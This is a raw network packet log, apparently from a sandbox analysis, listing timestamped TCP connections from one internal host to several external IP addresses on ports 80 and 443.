Oct 7, 2022 15:59:00.578421116 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.578504086 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.578551054 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.578622103 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.578670979 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.578783035 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.578849077 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:00.578892946 CEST	443	49707	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:00.741261959 CEST	49707	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:17.817545891 CEST	49700	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:17.818538904 CEST	49709	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:17.844813108 CEST	80	49709	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:17.845056057 CEST	49709	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:17.845443964 CEST	49709	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:17.847327948 CEST	80	49700	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:17.849742889 CEST	49700	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:17.871772051 CEST	80	49709	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:17.872682095 CEST	80	49709	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:18.028872967 CEST	49709	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:18.584361076 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.584450006 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.584559917 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.585195065 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.585232019 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.634402037 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.634532928 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.721657991 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.721752882 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.722680092 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.724106073 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.724173069 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.835946083 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.836029053 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.836091995 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.836150885 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.836173058 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.836203098 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.836215973 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.836220980 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.837276936 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.837291002 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.837307930 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.837363958 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.839127064 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.839175940 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.839204073 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.839236975 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.840069056 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.853362083 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.853435993 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.853513956 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.853563070 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.853759050 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.853822947 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.853843927 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.853899002 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.855155945 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.855201960 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.855256081 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.855276108 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.856189013 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.856234074 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.856261015 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.856281996 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.856302977 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.857260942 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.857341051 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.857356071 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.858175993 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.858239889 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.858256102 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.859098911 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.859139919 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.859174013 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.859189987 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.859255075 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.859966993 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.860028028 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.860029936 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.860044003 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.860213041 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.860827923 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.860894918 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.870183945 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.870239019 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.870337963 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.870383024 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.870462894 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.870510101 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.870527029 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.870552063 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.870573997 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.871335983 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.871408939 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.871424913 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.872132063 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.872298956 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.872313023 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.872493029 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.872555017 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.872560978 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.872575998 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.872682095 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.873259068 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.873305082 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.873342037 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.873356104 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.873411894 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.873955965 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.874017000 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.874656916 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.874721050 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.874726057 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.874763966 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.874922991 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.875333071 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.875384092 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.875401020 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.875418901 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.875610113 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.876245975 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.876306057 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.876312017 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.876324892 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.876355886 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.876411915 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.876425982 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.876487970 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.877084017 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.877135992 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.877154112 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.877170086 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.877979994 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.878040075 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.878047943 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.878065109 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.878093004 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.878093004 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.878457069 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.878472090 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.878818035 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.878901958 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.878972054 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.878988028 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.879044056 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.879549026 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.879606962 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.879637003 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.879651070 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.879888058 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.880047083 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.880129099 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.880141020 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.880152941 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.880192041 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.880212069 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.880227089 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.880614042 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.887114048 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.887181044 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.887226105 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.887243032 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.887259960 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.887300014 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.887314081 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.887367964 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.887372017 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.887382984 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.887437105 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.887438059 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.887455940 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.887500048 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.887502909 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.887516022 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.888264894 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.888319969 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.888336897 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.888370037 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.888396025 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.888397932 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.888454914 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.888470888 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.889113903 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.889161110 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.889214993 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.889244080 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.889264107 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.889283895 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.889903069 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.889962912 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.889965057 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.889982939 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.890038967 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.890050888 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.890064955 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.890084028 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.890120983 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.890132904 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.890147924 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.890173912 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.890850067 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.890944004 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.890979052 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.891025066 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.891036987 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.891053915 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.891149998 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.891239882 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.891716003 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.891787052 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.891792059 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.891804934 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.891829014 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.891861916 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.891876936 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.891927958 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.892352104 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.892395973 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.892414093 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.892427921 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.892446995 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.892487049 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.892505884 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.892522097 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.892546892 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.892546892 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.892601967 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.892616987 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.893285036 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.893326044 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.893357038 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.893390894 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.893399954 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.893419981 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.893440962 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.893455029 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.893507957 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.893522978 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.893594027 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.894205093 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.894268036 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.894277096 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.894290924 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.894325018 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.894373894 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.894376040 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.894391060 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.894426107 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.894443035 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.894494057 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.894511938 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.894526005 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.894669056 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:18.895148039 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.895332098 CEST	443	49710	31.13.92.36	192.168.2.5
Oct 7, 2022 15:59:18.898328066 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:19.160229921 CEST	49710	443	192.168.2.5	31.13.92.36
Oct 7, 2022 15:59:24.325227976 CEST	49704	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:24.326364040 CEST	49711	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:24.351805925 CEST	80	49704	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:24.352057934 CEST	49704	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:24.356035948 CEST	80	49711	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:24.356463909 CEST	49711	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:24.383379936 CEST	49711	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:24.413260937 CEST	80	49711	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:24.414273977 CEST	80	49711	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:24.648972988 CEST	80	49711	103.136.42.153	192.168.2.5
Oct 7, 2022 15:59:24.649144888 CEST	49711	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:59:25.273050070 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.273123980 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.273226023 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.274020910 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.274053097 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.327465057 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.327585936 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.438173056 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.438221931 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.439152956 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.440437078 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.440476894 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.576097965 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.576165915 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.576220036 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.576263905 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.576267958 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.576298952 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.576327085 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.576328993 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.576383114 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.576394081 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.577239990 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.577327013 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.577339888 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.578933954 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.578977108 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.579010963 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.579025030 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.579092026 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.592859983 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.592948914 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.592953920 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.592983007 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.593385935 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.593450069 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.593466043 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.593524933 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.594799042 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.594863892 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.594892025 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.594954967 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.596183062 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.596257925 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.596257925 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.596282005 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.597151995 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.597208977 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.597227097 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.597278118 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.598170042 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.598237991 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.598256111 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.598282099 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.598592997 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.598850965 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.598923922 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.598949909 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.599046946 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.599756956 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.599821091 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.600519896 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.600579977 CEST	443	49712	185.60.216.35	192.168.2.5
Oct 7, 2022 15:59:25.600584984 CEST	49712	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:59:25.600604057 CEST	443	49712	185.60.216.35	192.168.2.5
